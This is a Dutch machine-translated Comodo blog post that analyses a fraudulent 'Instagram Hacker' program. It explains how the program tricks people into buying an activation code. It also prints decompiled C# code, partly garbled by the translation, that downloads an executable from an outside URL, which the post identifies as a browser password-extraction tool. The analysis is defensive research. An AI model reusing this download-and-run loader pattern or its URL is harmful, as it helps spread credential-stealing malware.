Leestijd: 4 minuten
Veel mensen beschouwen Potentieel ongewenste toepassingen (PUA) niet als een ernstig gevaar. De reden voor zo'n roekeloze houding is dat PUA's meestal worden geïnstalleerd met toestemming van de gebruiker. Maar deze mening is een grote fout. En niet alleen omdat een PUA heimelijk andere programma's zoals adware of spyware op drive-by downloadbasis kan installeren. Het levendige voorbeeld hieronder geanalyseerd door Comodo Threat Research Labs experts laten duidelijk zien dat een PUA een veel bedreigender wapen kan zijn.
Maak kennis met de software genaamd "Instagram Hacker". Het heeft de officiële website https://hackinstagram.net/ en belooft ... om elk Instagram-account te hacken. Bovendien kunt u het gratis downloaden en installeren.
Na installatie wordt gevraagd om een Instagram-profiel-URL in te voeren en het wachtwoord te hacken.
Het resultaat komt binnen enkele seconden:
Maar nadat u op de knop "Wachtwoord bekijken" heeft geklikt, verschijnt er een nieuw venster:
Als u op de knop "Een activeringscode ophalen" klikt, wordt u omgeleid naar de pagina "Kopen".
Het biedt aan om een "activeringscode" te kopen, maar ... ruikt u een fraude in de lucht? Het is duidelijk dat er geen software kan bestaan die secondenlang een Instagram-wachtwoord kan breken. Dus is Instagram Hacker gewoon een andere misleidende tool om simpletons te bedriegen? De beste manier om dit te controleren, is door in de toepassingscode te kijken.
De code is beveiligd met Dotnet Reactor maar kan worden gedecodeerd met de4dot tool.
En nu kunnen we zeker zien dat de toepassing een fraudetool is. Het eerste codefragment vervalsingsindicator.
Maar een andere is interessanter. Zoals je kunt zien, bevat het een URL met een uitvoerbaar bestand om te downloaden als de activering is geslaagd.
Venster ()
{
Class2.qDiUy7EzyuIMj ();
this.filename = "view.exe";
this.uri = nieuwe Uri ("http://software-logistics.net/external/component/download/view.exe");
this.InitializeComponent ();
if (File.Exists (this.filename))
{
File.Delete (this.filename);
}
proberen
{
WebClient client1 = nieuwe WebClient ();
client1.DownloadFileAsync (this.uri, this.filename);
client1.DownloadProgressChanged + = nieuwe DownloadProgressChangedEventHandler (this.method_1);
client1.DownloadFileCompleted + = nieuwe AsyncCompletedEventHandler (this.method_2);
}
vangst
{
this.method_0 ();
}
}
}
}
Als we het uitvoerbare bestand uitvoeren, zullen we ontdekken dat dit de WebBrowserPassView-applicatie van NirSoft is:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView is slechts een wachtwoordextractietool die de wachtwoorden onthult die door de webbrowsers zijn opgeslagen. Alle wachtwoorden die deze software kan extraheren, zijn dus niet van Instagram, maar van gebruikers zelf in hun browser!
Laten we verder gaan: alles wat Instagram Hacker doet, is het downloaden en lanceren van nog een PUA van NirSoft. Dus we worden uiteraard geconfronteerd met een fraudetool. Let op de manipulatieve psychologische truc hier: als een slachtoffer ontdekt dat ze is bedrogen, meldt ze de politie nauwelijks over het incident. Omdat ze in dat geval moet bekennen dat ze Instagram probeert te hacken, is dat een daad van cybercriminaliteit.
Maar het is een dun uiteinde van de rand.
De gevaarlijkste bedreiging is dat de URL in de applicatie gemakkelijk kan worden gewijzigd op elke andere met een schadelijk bestand dat wordt uitgevoerd op de computer van een slachtoffer. Dus deze PUA - en vele andere voorbeelden van een dergelijk malwaretype - kan dus worden gebruikt voor de enorme verspreiding van verschillende "zware" malware zoals trojans, achterdeurtjes, ransomware enz.
En dit is een goede reden om PUA als echt gevaarlijke malware te beschouwen. Omdat het een springplank kan blijken te zijn voor een verwoestende massale cyberaanval.
'Vandaag moeten we niet nadenken malware als gevaarlijk of niet zo gevaarlijk ", zegt Fatih Orhan, het hoofd van de Comodo Threat Research Labs. "Ieder malware bestaat niet in een geïsoleerde ruimte. Tegenwoordig bouwen cybercriminelen lange malwareketens om gebruikers aan te vallen, en zoals je kunt zien, kan PUA een schakel zijn in zo'n moordketen. We moeten schoppen dus schoppen noemen. Ja, deze applicaties worden gedownload en uitgevoerd met toestemming van de gebruiker, maar zoals in dit geval wordt de goedkeuring afgewezen door fraude. In alle potentieel ongewenste applicaties die zich voordoen als legitiem, moet iedereen begrijpen dat het slechts een camouflage is. Daarom biedt Comodo niet alleen hoogwaardige technische bescherming, maar informeert hij gebruikers regelmatig om te voorkomen dat ze gevaarlijke valstrikken in de cyberspace vormen. ”
Veilig leven met Comodo!
Verwante bronnen
Wikipedia DDOS-aanval
Verwijdering van malware
Website Malwarescanner
Beste websitebeveiliging
WordPress Beveiliging
TEST JE E-MAILBEVEILIGING KRIJG GRATIS UW DIRECTE BEVEILIGINGSSCOREKAART Bron: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- Account
- Alles
- Aanvraag
- toepassingen
- BEST
- Blog
- bouw
- kopen
- Bellen
- code
- toestemming
- Cyber aanval
- cybercrime
- cybercriminelen
- DDoS
- rand
- etc
- Event
- deskundigen
- extractie
- Gezicht
- Voornaam*
- bedrog
- Gratis
- goed
- houwen
- hacker
- hoofd
- hier
- Hoe
- How To
- HTTPS
- op instagram
- IT
- Labs
- LINK
- lang
- malware
- Aanbod
- officieel
- Advies
- Overige
- Wachtwoord
- wachtwoorden
- Mensen
- Politie
- Profiel
- Programma's
- bescherming
- Rapporten
- onderzoek
- lopen
- veiligheid
- Geur
- So
- Software
- Tussenruimte
- geslaagd
- Technisch
- niet de tijd of
- URI
- gebruikers
- Bekijk
- web
- web browsers
- Website